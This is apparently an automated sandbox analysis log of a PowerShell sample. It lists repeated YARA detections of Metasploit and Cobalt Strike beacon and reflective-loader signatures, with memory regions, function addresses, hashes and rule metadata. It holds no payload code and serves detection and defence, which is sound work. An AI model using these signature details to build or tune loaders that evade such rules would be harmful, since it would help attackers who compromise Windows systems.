Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE2508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.ps1, type: SAMPLE Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: amsi64_1900.amsi.csv, type: OTHER Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C0F34 CreateProcessAsUserA,GetLastError,GetLastError,CreateProcessA,GetLastError,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithTokenW,GetLastError,GetLastError,GetLastError,GetLastError, 0_2_0000022EFA0C0F34
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B3E600 0_2_0000022EF9B3E600
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B1CE3C 0_2_0000022EF9B1CE3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B2F5A8 0_2_0000022EF9B2F5A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B3CFF0 0_2_0000022EF9B3CFF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B3B7B0 0_2_0000022EF9B3B7B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B26F38 0_2_0000022EF9B26F38
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B19680 0_2_0000022EF9B19680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B3C680 0_2_0000022EF9B3C680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B31264 0_2_0000022EF9B31264
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B31928 0_2_0000022EF9B31928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B35914 0_2_0000022EF9B35914
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B1916C 0_2_0000022EF9B1916C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B3239C 0_2_0000022EF9B3239C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B3C397 0_2_0000022EF9B3C397
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B30374 0_2_0000022EF9B30374
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B20334 0_2_0000022EF9B20334
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B3AAB0 0_2_0000022EF9B3AAB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C867C 0_2_0000022EFA0C867C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0DB6B0 0_2_0000022EFA0DB6B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C0F34 0_2_0000022EFA0C0F34
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D0F74 0_2_0000022EFA0D0F74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D2F9C 0_2_0000022EFA0D2F9C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0DCF97 0_2_0000022EFA0DCF97
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D6514 0_2_0000022EFA0D6514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D2528 0_2_0000022EFA0D2528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0B9D6C 0_2_0000022EFA0B9D6C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D1E64 0_2_0000022EFA0D1E64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0BA280 0_2_0000022EFA0BA280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0DD280 0_2_0000022EFA0DD280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C7B38 0_2_0000022EFA0C7B38
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0DC3B0 0_2_0000022EFA0DC3B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0DDBF0 0_2_0000022EFA0DDBF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D01A8 0_2_0000022EFA0D01A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0DF200 0_2_0000022EFA0DF200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0BDA3C 0_2_0000022EFA0BDA3C
Yara signature match
Source: 3.ps1, type: SAMPLE Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: amsi64_1900.amsi.csv, type: OTHER Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
